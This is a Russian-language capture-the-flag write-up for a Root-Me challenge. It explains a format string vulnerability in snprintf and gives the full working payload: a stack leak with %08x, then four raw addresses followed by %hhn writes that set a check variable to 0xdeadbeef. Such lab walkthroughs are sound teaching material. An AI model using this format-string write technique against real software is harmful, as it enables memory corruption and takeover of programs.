ssh -p 2222 app-systeme-ch14@challenge02.root-me.org

Уязвимость форматной строки в фукции snprintf

Мы получаем доступ к форматной строке и можем манипулировать ей в пределах 128 байт


Для начала необходимо узнать куда мы пишем ввод 



При помощи форматной строки можно не только читать значения со стека, но и писать в произвольное место 

Мы знаем адрес check из вывода функции 

Форматная конструкия $n запишет количество встреченных до нее байт 
Но можно еще и указать куда будет записано 

%num\$n запишет по адресу который находится на num

Отсчет на x32 идет по 4 байта от вызова функции

Принимает arc, поэтому на вход подаем строку 


Но нам надо записать 0xdeadbeef

Вообще паттерн вот такой

"addr1""addr2""addr3""addr4" + "%padding1%9$hhn" + "%padding2%10$hhn" + "%padding3%11$hhn" + "%padding4%12$hhn"

Записи адресов попадают на стек, формируя смещения %9 ... 
А потом мы формируем что записывать в адрес указанный по этому смещению

Так как 0xdeadbeef = 3735928559

это слишком много символов чтобы записать, пишем по байту 

Для этого формируем адреса куда надо писать 

Так как мы можем посмотреть куда пишется наш ввод через форматную строку 

app-systeme-ch14@challenge02:~$ ./ch14 'AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x'
check at 0xbffffaa8
argv[1] = [AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x]
fmt=[AAAA 080485f1 00000000 00000000 000000c2 bffffbf4 b7fe1449 f63d4e2e 04030201 41414141]
check=0x4030201

мы видим что наш ввод попал на 9 позицию в стеке, значит начинаем формировать адреса 

./ch14 "$(python3 -c 'import sys; sys.stdout.buffer.write(b"\x98\xfa\xff\xbf\x99\xfa\xff\xbf\x9a\xfa\xff\xbf\x9b\xfa\xff\xbf")

адреса идут по началу записи и +1 байт до 4 так как 0xdeadbef займет 4 байта по 2 символа на байт 

сначала запишем 0xef

>>> 0xef
239

notice: адреса надо записывать сырыми байтам в стек, форматная строка это строка 


app-systeme-ch14@challenge02:~$ ./ch14 "$(python3 -c 'import sys; sys.stdout.buffer.write(b"\x98\xfa\xff\xbf\x99\xfa\xff\xbf\x9a\xfa\xff\xbf\x9b\xfa\xff\xbf"); print("%223c%9$hhn%207c%10$hhn%239c%11$hhn%49c%12$hhn", end="")')"
check at 0xbffffa98
argv[1] = [%223c%9$hhn%207c%10$hhn%239c%11$hhn%49c%12$hhn]
fmt=[                                                                                                               ]
check=0xdeadbeef
Yeah dude ! You win !


запись осуществляется формированием пробелов которые будет считать каунтер, а n будет их записывать в позиции 9 10 11 12
на этих позициях мы как раз подготовили адреса по которым записывается значение 

сначала print("%223c%9")  16 - символы адреса + 223 = 239 = 0xef 
потом 207; у нас есть 239, чтобы получить 0xbe = 190 надо пройтись по кругу через 255; 256 - 239 = 17 -> 190 + 17 = 207 
потом 239; у нас есть 239 + 207 = 446, чтобы получить 0xad = 173; 512 - 446 = 66 -> 173 + 66 = 239
потом 49; у нас уже 239 + 207 + 239 = 685, чтобы получить 0xde = 222; 768 - 685 = 83 -> 222 + 83 = 305 -> 305 - 256 = 49  

print("%223c%9$hhn%207c%10$hhn%239c%11$hhn%49c%12$hhn", end="")')"
Итоовый payload = 4 адреса со сдвигом 1б в буфер + строка записи по адресам
